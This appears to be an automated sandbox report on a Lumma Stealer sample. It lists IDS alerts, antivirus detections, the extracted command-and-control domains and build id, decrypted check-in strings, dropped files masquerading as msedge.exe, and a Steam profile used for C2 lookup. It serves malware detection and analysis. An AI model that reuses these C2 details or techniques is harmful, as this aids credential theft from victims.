Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.078528+0200	2056046	1	Domain Observed Used for C2 Detected	192.168.2.8	53256	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.101467+0200	2056052	1	Domain Observed Used for C2 Detected	192.168.2.8	53502	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.017153+0200	2056054	1	Domain Observed Used for C2 Detected	192.168.2.8	55617	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.039669+0200	2056056	1	Domain Observed Used for C2 Detected	192.168.2.8	65196	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.065314+0200	2056058	1	Domain Observed Used for C2 Detected	192.168.2.8	57903	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:25:34.002554+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.8	50097	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4tXm5yPtiy.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\DqsZwsEl.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\MQUzRRxE.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Edge\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\NKJXVMBv.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: physmeme.exe.3500.9.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["tearrybyiwo.shop", "surveriysiop.shop", "tiddymarktwo.shop", "tendencerangej.shop", "fossillargeiw.shop", "appleboltelwk.shop", "coursedonnyre.shop", "captainynfanw.shop", "strappystyio.shop"], "Build id": "1AsNN2--5899070203"}

Multi AV Scanner detection for dropped file

Source: C:\Edge\msedge.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\DqsZwsEl.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\GfhqKgmo.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\MQUzRRxE.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\NKJXVMBv.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\NhvHKDkY.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TUtPMNAm.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\VPYFfuwr.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\WpXNITDI.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\eGTFsMJp.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\fZXNGngO.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\iacMOeMk.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\rWRTdVVu.log	ReversingLabs: Detection: 29%
Source: C:\Windows\Speech\kdmapper.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\Speech\physmeme.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: 4tXm5yPtiy.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\DqsZwsEl.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UXzpIjDH.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TUtPMNAm.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MQUzRRxE.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GfhqKgmo.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JlazcluE.log	Joe Sandbox ML: detected
Source: C:\Edge\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NKJXVMBv.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EVLpKOHn.log	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: strappystyio.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: coursedonnyre.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fossillargeiw.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tendencerangej.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appleboltelwk.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tearrybyiwo.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: captainynfanw.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: surveriysiop.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tiddymarktwo.shop
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000B.00000002.1545636702.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 1AsNN2--5899070203

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.213:443 -> 192.168.2.8:49711 version: TLS 1.2

Source: 4tXm5yPtiy.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1489764684.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: 4tXm5yPtiy.exe
Source:	Binary string: em.pdb" source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B03D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: 4tXm5yPtiy.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1502683045.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1503257349.000001FB23F90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502895817.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502683045.000001FB23FED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1502820544.000001FB23FD4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: msedge.exe, 00000030.00000002.2113348313.000000001BEEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.pdb source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CBAFC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF68B4CBAFC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0015A69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0016C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0017B348 FindFirstFileExA,	5_2_0017B348

Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	11_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	11_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	11_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	11_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	11_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	11_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	11_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	11_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	11_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	11_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	11_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	11_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	11_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	11_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	11_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	11_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	11_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	11_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	11_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	11_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	11_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	11_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	11_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	11_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	11_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	11_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	11_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	11_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	11_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	11_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	11_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	11_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	11_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	11_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	11_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	11_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	11_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	11_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	11_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	11_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	11_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	11_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	11_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	11_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	11_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	11_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	11_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	11_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	11_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	11_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	11_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	11_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	11_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	11_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	11_2_00443FA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.8:50097 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.8:57162 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.8:64156 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.8:63708 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.8:57903 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.8:65196 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.8:55617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.8:53502 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.8:53256 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49711 -> 104.21.84.213:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49711 -> 104.21.84.213:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tearrybyiwo.shop
Source: Malware configuration extractor	URLs: surveriysiop.shop
Source: Malware configuration extractor	URLs: tiddymarktwo.shop
Source: Malware configuration extractor	URLs: tendencerangej.shop
Source: Malware configuration extractor	URLs: fossillargeiw.shop
Source: Malware configuration extractor	URLs: appleboltelwk.shop
Source: Malware configuration extractor	URLs: coursedonnyre.shop
Source: Malware configuration extractor	URLs: captainynfanw.shop
Source: Malware configuration extractor	URLs: strappystyio.shop

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zelensky.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
